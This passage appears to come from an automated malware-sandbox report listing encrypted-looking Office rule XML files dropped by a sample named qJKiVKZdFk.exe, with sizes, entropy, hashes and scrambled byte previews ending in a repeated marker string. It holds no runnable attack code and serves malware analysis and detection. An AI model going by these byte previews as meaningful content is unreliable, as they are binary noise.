                                                                                                                                      Preview:<?xml(....Y_K(.A.......'.X.4.f.........~..+,...4...........U3f.._..^......\^.k..!.5=hY..E.2.n...M..<.m.....}..A....l.M.....I}....my......J.X.......yp...V.a...Z.:..s...*...q.....+...m. ..z-..[.=.....{ur*.U.A+k.xe=....Y..r;....o#].V.~..x.[.3/.H...W.4?.A.C..f...R...ZL..V..~.TOK.........>.DG4..O....o....X..........E..RQHR/..dU.,..~H;...i...r...HE..G....2.6....X.<7.^..^..T...Sd1....aP..M..]>.k...N...a..7..}.p......Z..q.k:*.h..@..G.&.6.C...Or`.=S.Qd*o..xA..$2.h...q.4.s.....-T&.....D3....?.J.}z.&f..**m.W.....J.q.4.....H....g|..1.'M..c..9.........*.e..../.zV.sv/5;e..._e...c....-3e.a...a.........-$.X.$4G....xNz..2...N.P.....b%C!G~.\t. ...RZ.bU.V...b..M...=2......T......X.g|}.`c.#L.k..........7Z.~..`.V..o.s...W....y./@3..Y..%..%*.s..._.lN.pkN..6>.^.*...G`....cS...o....m....3..]k...P...[R9..:...g. .Q..h.p.a.<Q.$.........!.#..Bb...7..mr.B&lB.}Z...t.....s.P8.D......2_..#...a...$.......a..|.,B.q.=g...\.M..F?..`..IW)xqK.k...+R.0.....#..a... I.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170111v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1024
                                                                                                                                      Entropy (8bit):7.7927391518301565
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:goqzPFTaB55nLbccex1BdAmz2YN+ARdzL6SFxkXDRutHkHJbD:goqzFTObcpx1Blz33OSCViHaD
                                                                                                                                      MD5:31755588DFD1525878475ECB14D80272
                                                                                                                                      SHA1:B8F7A9E018D84F151D76BA606F7179164B5FA5D2
                                                                                                                                      SHA-256:27542EC79B82548436DB2FB4FE8F46B28AEE6460D1C9BF6408957FF2065B11D8
                                                                                                                                      SHA-512:562457856947B7C8AB579A0E5B821EF977A93A943B41EFC8C80D85C3BA0F3970C3CB5128D550EAAFCE544BBED694FB839214656CC95C62D81F71EE1CB0B8346F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.'T.._...[...^r.....X.[`.!.....U........6.,.m....u.....t"...#..\r..g...de!..AR..p......[....9./..2.T=*?.b..9(+.,...u.l. .B'..$.......:d..3<...;.....0...%AZ:.3..T?.[W,+~.No,h.""....Q.%?.../....R....z._d...ds.....1..!.W.3o.^...+.....U&aJX...t@..u...t.>x..gN...>...4.^R|;....'&.-!.....6.v..O.....X*i....yD.........X/...Y;..e.=D...4.M.u.7a.$.-:.n..Ov.p...nX..0-...c|.. .3..*.WG.gTy..]m-FW..lW.8.E..,.h.D...../........0VM.ex.=....6Q Q.q...1.a...y.S'0..9.I.}6..... ...o.+.Am..b..z7T.....F/Y....<7R...._].5....%U...L^.PI...<.1.:..NF2......~....i.cT.P..Nd.~.......0...tqb`..bJ..L./..7..c..8.......P-..t.Z'*...4...MM].r4z....o:..M..%M........T==.j.^#Y...2.c.5.4g..3......v.,....n...s....Fb. .....h_..i.VE[.....9.t....`..t....,...|..ZD..WC'c.....%.[LU#@..V....3.Z...Bi..2vx..9..L..Q.....7C....gR.l......%.k......A.....M$$..-c.9B.-.....oC1........=.Oo......[.W.*...x.>.=..d@V...+.v?..Y.ub..."..h....tH....^:tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170112v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):943
                                                                                                                                      Entropy (8bit):7.782715304588225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QAvX7vGXI54pkokNsOjy9+CUFkcLvpCbD:QAvX7gI5C1kNV8GjLv2D
                                                                                                                                      MD5:94EBDBB01E85BAE0DFAAD352EA23C0C3
                                                                                                                                      SHA1:A8EBB0E4E817339074A43AF1DD46C675125092A4
                                                                                                                                      SHA-256:66A90C4ACA7EBB4BB1FBBF39584FE2DFE5DD9BCD46F2EE75A7FC171E0961457A
                                                                                                                                      SHA-512:26F635833A6CC16868F1F81E00F08E66543FBD3F6596F610C1E94260AD13CCFA3EF1A3C567010CE8F89B0F5EB86873A316047648A7720DC663D584EDF9AD2205
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlc...'.C.(....-o..:?....b....fSO>i..S.=....65dSF...fk.ZZ.....!..B.._\B.G.]...[Z..+...e..z... .sL.YN!.... ...B~.{..gS>Z..Cd........$\C{F.-.p..>...I......!iN...S2."..%:..mq[.....o..........-...G8.\T.0. <A........W....r...8..p?!..@...*kD..@..^.Q5......S...".......5. ..p...9...=.v......50o....;.J...@<*.jh_T`y.R0..".@....4u..J.k.yx...u...P....=.9~.a..... }.@E....v...'..S.omM?....vj|...A...{...q.L.......#...ds..:..(.y..{Y..._.<x4IK....x..H.=...eS.J...3..qV..7.,....J.3.....1s.2....z..l...~?.]s...\i.'......C...cmu4...z.n......%s....Q.chF...@.a.~.......~.3h~j...;H..T.$6....iI@..$c..T+...#..U...KK...........Q..Z.+#...,........yW......N_h..6R.....@...6[]."...FV.G9...4?+T.Xm.....r.......X.i.mT...+#4C.@..u;N.Xw..c..-.....>...>-.=.....{......9.7..1...3N..l..xb0t;k.....$....!6..U..(.1..y.....e..........".l.,...<..'tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170113v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.715836150710526
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:0tbaFKWHLVWJB9Xcojj9NFaOY2qZaMLCLRyizDA6OS6IaoR+3uppj3cPukIcii9a:0CKW6BJcKAFoPLRm6OSja8H4UbD
                                                                                                                                      MD5:1621164D4F24FA0B7D1AD526D2C90762
                                                                                                                                      SHA1:B4A63E9E0FA114103A1F3FCDF08FF402EEE9A063
                                                                                                                                      SHA-256:E8D26275C6873685E43AFB577ABF3FAB2FC8C35F9F6DABFE269C547FBCEA47D7
                                                                                                                                      SHA-512:D426D96E121C4B000154FC2D14B6C07C63DAA392171814344D5A20487E72C6D92537808B0F039EBCE6B034FACAF4F45B999012A3C1FD65B0E06BC9CDEB78130D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.G.d*....X..}......Nx.,.Z0.lU....U}....H....'...z..w.d:.T..^S.:3.....~#'.y.....Y.:.V...A`7.I.~6n.).......3.t..+.R5...UWU...C....a..8}...3!{.|..+.m..5..!D.,#d.=....c.i.7.-...]w.k}.ts3..#...B.u....C...}WG...Xs5.....F...r.~.B|....x..Ok..*mi\..>...+;J...Y@.@3.?..r#.4.....;(..6s.1..R.......1b......d....l7....~...Q.t...5Z..}.%....$..8AfQ....9...*..O...p.....n.......R..N..nS..*.)..&}...P..*.Ls..u.l..6..S0K.F....(eqw.......K....%w...l.j..Q....p^sx..'..H:..)..ls..$...|........!.....'..I/...~.M....u.<....BV,.#`..D....- r...j9.M...S++..X.i......\0iaoGb..'..+..5G.*.-.w=..>.....T.e..9?.|..~L`Sg.._..z6.&.q..O...$g.6..BV....."T.........Y.M.PuX.8.O.......xs2S.$:VO....n..ni...#...z..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170114v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1156
                                                                                                                                      Entropy (8bit):7.827495515297528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8ghkTWoc9TcZJ2Y8ycsaqGL96LinG0uCc+gi1snpsiD3WybD:Vh/fTcLoycsaq150vc+gqsD37D
                                                                                                                                      MD5:995813A870F692AE06201E33DC1062AA
                                                                                                                                      SHA1:30A6721D87C0A8D8BCC950BA5A35A11F2FE39DDE
                                                                                                                                      SHA-256:35E46F61E8379734BD1D36CD84CE6CD7645F6F9D10F9A0CC6236524566D404C3
                                                                                                                                      SHA-512:7404BF642453B21173281FF4F7FF3442A0A2236427A17BF7A45040D0054E665BBD29AA3D9769E3966F303188B5B195139645DA6BEE1C1425EB29D28BBB8F28FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlH.^.Pa.....!..2rgF.f0.N.........I....!..O!.n/pl........#....c......C.f.g6..u..2....;H......M.U...E.4g....6u....*a.....j..........\e..df..hX......._C}.`....!...r".q.L6..D....m.%OX..qA..Tw..P......_m...s..0.....m..(...{..?...C.l.&.&....Z.L..([&..A._P....!.i.*...!......#..Vl`......cy..tje...........j. B~Ms..=..k...u.'.96...2....Z...V.|.L.5.=...P:....>..... }9...H..i..P.n.=.4...q...J...&.N.aZ-........d....=.\.....-.!i....M...V...C..d.p.~..b...b...v\.Y....E.....(...@...a.*5V...P.T.a...;......]{....E...d ...2&..\..+.A........|%..q.y..9.z..".5...Mc.....a..9. ..VE..L..JCcG....A.aj^.O...d.=...b...rJZ....b......o.._C.dC=R[.....K}..a.:......p.:......xP....s..6;..............l'..."|J..T.(B.iE._.SM:..y..".n..X....g.x.|...+2.v.o...%m..C&.(........]K).f...(&......G#...j..4.........0r"@.7.F../....7.0....J..fl.......Q.R...`..j..vwT...d....p.kn.M.V.Fb..............'.l5i....2.O..C5......K<...:&...{..(.I. ....v).v....y.c..@.....I..1 .E.....f.=mr.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170115v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):927
                                                                                                                                      Entropy (8bit):7.724617625847123
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:A2CV98lxpCtzykU/zWRVUtrX4yK/caiKixzh5PP1bD:AdXgD2zykU/sYX4v/caZWzrXlD
                                                                                                                                      MD5:EAA57EF8D1237BF191D4205D87B1D711
                                                                                                                                      SHA1:526B3E938F052379C1666CC9BDA95A8A8CD74D65
                                                                                                                                      SHA-256:951168A1706B6BE3BAD1A280CDFCAF981A89DB5446414DADB56BE8CB7F61F37D
                                                                                                                                      SHA-512:189B48D7696A4C8ADD9CB3B93C1661D7494BA040B7B52FB957933A8C18D76AA29B5B3136E8F24E0875321500F790B94EB5DC7CBC7C8C0D7F177CEE22CEBF926D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml}.[...m.~..i...S..f.%...6.0bR..-.8....5..n..z...Ae.....W..Q....?..9...p.jf....i3......bOhz.#.,$.I.0|.F......:...xI...#.BIhb[.g..X....A...Nh..w'1.0..=j`c.....<.....r7...<h..m.$4.59S.|=..._Z.4....W....y.....p.....V)H...,F......Q"Y..9....l..U..k._+....Z.G.Y.D..n...^..!.q&`.....[<...'.......0..X%].@...[.....X.g..6A.g|....Uh..5!...M$ $..5.... <...\Q..'VO..N....K.=T..MC...hwp.....n)...p...b.89]D.9se#.._T 8Z...,z.p..n.).i....Z .IFLM.e.a`....WaL._j.....P..S...n...k....~..B.,.v.G..j.x0...;...e..H....d&.T..+s`.T.<...hMB...h....yp.#....=I.pyz(.....t.2L...}.mj...i.2...4..\..{......OM/.....*S.v..N..1..UPB.gc1.VBL..nS.3?``.6&&.E~V.].....z.;..<%D.......y.pI.K.t...jT.3H.p. .+v.....fb.....7....%...=M...gk.EH..U.rN..8.y.d...:.......O.....eQj.+...P.,wF.258.T..<..]...DE6...E..^..v. ,.T.......~..:....j.{.S....-iPtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170116v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):717
                                                                                                                                      Entropy (8bit):7.688817598967381
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:qUN4pdMLV0ABNQ1WGoTWm5GfwC3M8K2kzt3bPpM+pkwnukIcii9a:xN4pdMLV5b6Wjl5G73MT2kzt3zpM6KbD
                                                                                                                                      MD5:D27E4DD4F87BD75E5C46745F7378C385
                                                                                                                                      SHA1:507183498615A29EC3BB9D16FA771DAE2C7EF3A9
                                                                                                                                      SHA-256:F7AEC001DE26E72FD7B2A8403FF96C2B43091839D6CD986E26D051BB374751B3
                                                                                                                                      SHA-512:E45E8D461E1ABD04AD85365A153A87BFFB0CB5FF86DB137062A569EE2EB1B395DC277D3F2E0EF3C48E3872B1AC806B098DC9D05BB7662DE31E10E9D6A132F340
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.$.$...2%x.J.,i.k.ao.).y'.. d..8..:%.[.'A.......b y.{\u.MY.....f...jX.._.H.y.2....T..Y.7..zB..j!~..:xnR.)...#.#..... .2..a.t....32.8..w.u...D.V.W.,.T...../F5b.j...}.K.X._.h...jW....(E.:..@..............2..a...vF>.TC.0'...0...7.~.....O..r..~...,..`.C...8\_6).<.m....z..t...X$.}.A...K.E5..z...b..%.F..2".......;HT_...s.w?..+....x..}........~.ZU...J......?.o....v.j..u.._f ...!k.h.jS..iC.FF..$.r.@U[..hB.q...r|.^.c..~.U..!2.f..O.....;...k..4.j..N*...)c.dg.l.."r...S_\oR`..b.WUm......X.\.G:...9..!.dC.!@....|4...ij..V...dj2&.ab= T...K1.8%e..?N.IJ..FW..F..z.....f.=.&2h...s1.%?...@....=......@No.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170117v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):942
                                                                                                                                      Entropy (8bit):7.791162277545863
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uL211nojvhooGn1UiM1lqVT4xK93fO2LucrJpbD:a2wzhoH1pM1U93f6cr7D
                                                                                                                                      MD5:91CD6139B0861B27214E468970D46545
                                                                                                                                      SHA1:08C766CECC1A94D9686EA76DCA747162977B45BB
                                                                                                                                      SHA-256:19A411C559D5CABA8A7BC618D6A951131E6D3FE3D865577421E98378CD6F2EBC
                                                                                                                                      SHA-512:1CE5088E4FF755C1B73F7FA136D0A39D38AA8F88885284DB364A0D366FC1C6E9122FB18B5BDBD027249F59DA5AB7C63D59AABDDA3AC2A4B9436F6D4094C6421F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.A...J..Vu*3Sb....iH..5\f..Q..g..|.i....M<.J.d b.....BK...#..<f....R.N..TQS..W...9_.{aU'...)Q.....a..........]<...........w.L....N.W....G(W..6..63.Z..y!.#.].*N.n.....9[..%...`.j..\....F|...F.<..E.%l.b........g.....O...s.\0y...........M....x..%.`.`....s.A.H...........d.nCJ^^I..D......OC.8.t...Z..%.$.K...=V.|..}..w\.*......A...c._o.....{..........,S...&.j.......,pMk.>j....i.."...A.; ...m.^....z.."I*8.a.s........?*..5..H....Yz5~...2...i"g.y...W"`......J.........#K..9}..v..I.A3}..,Mq2.7m............,.....:j3.h.....vW0]q.@.._.z..Lw.c.~..x.w.o....y.AY..7L...U..F...3...x..?...(7.O.%._.D..!W'...w..,..[...n..k%Xun@Q..]...S....:..P..dW..IH......./y9..Jmbq........n..k.........s.K.ZE....0..i4.J#..z.fE..f.@#...`...u....p1.y.+.n@....<,..~......B.. jv....KN...)y...r.....YZ,..p.O.A...g.PX...1z6.Z.A.D..Yk,.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170118v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):949
                                                                                                                                      Entropy (8bit):7.76012219237144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6jKxWIN303YyRweRPHWLMgLhgKIzKMnB/n5mDWbD:6OfN303DweJWzUB5/D
                                                                                                                                      MD5:5A3C9BD773E72D1AB7238FF6F47ADC37
                                                                                                                                      SHA1:E91FD5618919132C1D49450172C08C2730A503BE
                                                                                                                                      SHA-256:0355DBA54CAE3C9FE37D9200805F2831A1B82FB0594CC17AE04F044856C9D851
                                                                                                                                      SHA-512:E9BB090805BA0C2D903B74E1ABF4422A2AEFE62BD4D708159F3C138A432922B0B76CEE605004C6670A12C54192E0BC1C10FD2ADFB3B47D8C95AF6951EF30BC97
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......9..3!.%..|5vz4..P.$m.m@...K.a?.-9...d..]^R)......m*r.......r..*..Q....f..e.`.cV...QTm4C...IV........?@f...j.d.6.f.....yT..6..A...6z(..@W..N..... ....K.qp..wN.zs..:..R.B...]}..uL".w....i...n^N\%8E..........f..4..Z~u5.L.........\..<t....e!..M...U....^V30D_}E...Qi.......9._..I.w...v. f....(.0..`.H.Qa.4lq.`.Z.8LL..J.$....Q...>-U.E.....X.......l.S.......(..$..*./..z.4..P'.P.b....?..Ca0DI...Yg..&U.....f.C.!?.n..B...m.q.....%......J..Y.d\..D.......DQ.../% .;Ui..."..xL..B...Q...4.5.........xq.)..."..e.....0.B=..Y.^`..P.r..+../`K.H..Y.... 7.d.zL......k*..e...V.v....u.......dhF.S...&.g......0.......}(M..J.9Gg....40Z.R.'N.X.@...+..Tt .....S.s..o.....1%e-._.J.S_sg8...E..{.$"q=...:.7...oq...46xF=S.N..S...[...(.j4..z..#...j.aI..R.....k......6.n>2KYK*sK/.O."..]..j..........b.....+x.wIb.yl^S.^3AY!10T...^g.`.Y.m...A......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170127v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):867
                                                                                                                                      Entropy (8bit):7.760067620387035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/WjB4v6KJ7QkGc1RHI5FMM8SiqFH4B70bD:OjB4vHnGc1Ro5OaNFH4BCD
                                                                                                                                      MD5:589BB248C9A3632AB9022ED7E62A734D
                                                                                                                                      SHA1:6D547DD1362ED037642A3FDCC57E43205452989C
                                                                                                                                      SHA-256:48E7C043565497554EDD85BC67DFF5BF70365F00FB94ED876D6224B4A75324C3
                                                                                                                                      SHA-512:1B8CBC144D28DC5FEA2AD98D11A65E333C6B69CF04937ED208225770C68C5964509DF48D641AA36B3BDD97F0E2729F94028929298EA119D9147AA1E67B538AC6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.P...\...)J.........a..v.Y....MSn.......It2../.s..+.)\<LQ.w.S...GL. ...gp.o..3..I>.z.`..po.^L.E....g....k.v1...6.........>&.......M....,....^..S@......2.^...|..p.x...J.......vXWS>..$j.25.Q...~...Lv>#..{.6Ty8...:..~...L.)lo.A.@.j.....7......M?.i...:N''...'.....e.x....... .1.."7.`j...q..._.9;nT....Kv..M....wV.T8.....%......1.$.Ia..~7.....Td./f...-..R%.au........h.....{.Lv...../x{`_.HC..*..^5pO..b.m.F....[.X...... 4.O........c.:.!.#..T....5..\...s.av.`]..-/E.....0f...8'...>...2...>XT3Id..+...@bmtH.=...j.-.rE...x..U....3...F...-6....!.'jp...M......j..|.v.^.t2....F&.4.C..H".h..W.c.....!t...7*X..X2.]o.(...J.z1...L...Y.....i....2Q..-Y08R.0B.A....0.c....a.\.....f.....pos..?x..:.....Y...w..vN..Hg..h.%.J....g...........N~......!........i.UH.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170129v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):918
                                                                                                                                      Entropy (8bit):7.76988343458678
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9lBNvMKwoh2zsFEBjkmAi/OrMVBSKtDQ9812kdMtUbyWbD:hNEKfvFEBNBVBSK6W12G8Ub5D
                                                                                                                                      MD5:BF1D988062F44D5364C0F47F01FA1C2D
                                                                                                                                      SHA1:E390C437A3D430DBEE7D27320B65E8A22069901F
                                                                                                                                      SHA-256:A74F59D7923BB1B82D5425C637A2872DF7179ADAAA5C189DBDCFC1793AE49189
                                                                                                                                      SHA-512:D0A069A90E728758C63017B2D02227D972D1B301C8BD531089D3289D11F96DD9F4E0407ECB02BDB5EB44B957D9034D2DE4FE1E8E1E1E852AB05DA75C38743872
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml8.o..l>:.<....p.5..^.p...O.(n=!FZ..%#W{.o.z.JDp....JdV.WC...h/x..E.qx...# .|....!.....N..Y.....w..9\..y.Qy.}. ..;......;W...p...2.~...d.=#....xj.E..9..ckE..~.Z....C#.kC..'=m....F....%.mq8.-".L:k.Y........%!.3rz..'D....*../..3S.....".lg.%9......DR.du`eJ.R...O...-Y.c.r....Z.r.%-8..R..+..&..-.....d.....^-..Ma1.>....N..Uq...ee..V..\..%.....p...!......R>.x(J.QO.....q1..z.....V..IK...G...n.s.^...v.zc....Y[..'..{........9<..8.s.X...g..@$d...n....$..].#..%.~..ovq.`R$.^.f....ma5.6btH*.B. .1.......1..p&....9....l..0....}S...q..v(..z.<..S1}.uE.S...o..x..j.a|..aG..i...B.\...V.&G..6...~....N..yE:/.7..-..P....v[>[.R.Z._.>.8.o?..~.H.....-....Wt...`...4.b._...Rv.}*.}..M}..Y....[|.....YE.......<5C..>....&.....*..S.qD0u.W=K*...l...imb.vh..Z..o......+`..Q..~.Q&.n.i.h...d."....^....?.0.[......].~tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170130v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):898
                                                                                                                                      Entropy (8bit):7.755272063842583
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XuwOv/rgnGxtcWxt+n3L9bPGT/q5ULqJpi1RPdZbD:E/rayWn316/CfJpizD
                                                                                                                                      MD5:24E40ED6DB9A1927E95B5F6F52C28CBD
                                                                                                                                      SHA1:C0379F24633AB6AF560DCBAACECE992EBE91833E
                                                                                                                                      SHA-256:6DC8B62B13C45AC42325240E241DFA3A416677024314695C2F1048C460E59887
                                                                                                                                      SHA-512:28587B290AEA22DADF5D4F21DFF468F39AE6826F756392E8628CAF4598C26B0C7B437EF0D927C4EADD72A5C291A5CBEE17EBC851EFFBCA36977E3EF93212E638
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.qh)>k..u..PuO...u:..c.._.....es1..}.~..T.xl..k_Z..)..5'C..(Pk.[wHNB.......7...tH....u.|.}"...!!.e...<'..y..<...............L.........G.G<.i.Gy.G7..r.=.[I...\>..N.a..p.U..%.Zu!*...4.${E.O..).W.....y......B....Cg......oKdH....rW.1..e.>'.....U.BZ.s..x!B.......1.}......G.d".<.....V&gt#.Z;.0....)....%a..h,...!.<}=6..g..F{9..aG.;...D...!q.#..].qe.B.iQ....]..o.W)......g.'...K.?0y.......-..g&.c..}...."........7..gX.(A|:E..G..]....4ay^}._.Cw....F1d.i...G.%.j..i.^..%0H...z..i.m.].....>G..!5.G..K!@.XNL....G,k.......R.@5.....AA.]]..utK...z{.Z......x;..X...-.%..4._.[....\.z.^.I.C...T.LV.f.8&.......>.........e....(.`l.. i.6...l...5.$...Z.....}H....&..@3.\........x... a..:.^b..$Tj.m...]..[..3......#6.$..u../l,.."UD:.m..d...9..c,..0.o....N<.\.1J...H.2.;./D4...|.......c..|.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170133v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):798
                                                                                                                                      Entropy (8bit):7.765425837057079
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tl8B/GPgM2e44PXRaLnTxGt8tu1HgG0IbD:tlg/GPp1GzTEt8WHf5D
                                                                                                                                      MD5:9B5343B94EBB48C808E515348EE4689B
                                                                                                                                      SHA1:CC38D2B327FA6A5FF81296652F3B749C29CBBA3B
                                                                                                                                      SHA-256:41BFB07C3843BFDD6413BA3123E332013BDF9BEB90E48A3F93A99DCBDB7C2CE6
                                                                                                                                      SHA-512:DC49FD7ABB4804C2E8951F3A7C7C631659BB8751EBA2412144FBDA08C2B90AEBB1463D529D451832FF5AB1D8A312F66F6705DBD98F6F2DB50AF64D556B33ACEC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlbKW...B..R.G..4..;.v'5'.^..i$.F...R.C7&$....._.a.m....@.Y^vH...uC.f....'...L ...e.V...N..V.....7.;.....t...>}l.5....K#...4.....fD...}.xt...Pua...5..~....^...88.1MT..}..5.`....mA...<da...(/..B.@.e.S\......W..[.fde#J..yM.f.z.3.!.q].......Pj...z..,.UR..k....e'..bRlZ..U..X.v..s.^qT..i...K.......!.a`.W.9.......B......w*...a..+i%*../w..y.P+.N....C-..?...a.\..Q..N@..7..*........)B....{...../.....rG[.kGc.;;..Z....w..o......"@.gO.y>M.....\.m..V.daZB.......ot'......-...s`U....._*.."*...7h..L.....{.9._)jb...N#1....y......?uN.[l..Yp....~......'.!%......o/;..S.Z.+.\..k9.X[`w...~V..T.N.)8.:,.A.i..`l.$..z.M....O(.\O.%..&C.o.|...M..H...!...E.hO|....':`..S..o.\@...P.Z..F/d.W..+.e.-....3.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170134v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):788
                                                                                                                                      Entropy (8bit):7.695446748780772
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:VRnlA46yreXTibaHM7yyOm1FCxCIGCxuKlmpUK1IV1Cq6XHukIcii9a:dfyDi+s7yyN9IG/tpH12ChsbD
                                                                                                                                      MD5:046592B7110724B99F8EB6B64E57BFBA
                                                                                                                                      SHA1:09D37D4DE393E99070CDC0723777596C30139E21
                                                                                                                                      SHA-256:2268EB37C0E3F96183868B47533D37D8420AF1A1CE8FB063DC8455953B243983
                                                                                                                                      SHA-512:D97F404ABA1A6F50992BAAF5D1D1F6E0197CF6C822EB6C0F82433ADB6806AAD3001542B70C60F5D965C95B4780E67EA92CDC2E29361E5135808F8C77FE495B14
                                                                                                                                      Malicious:false
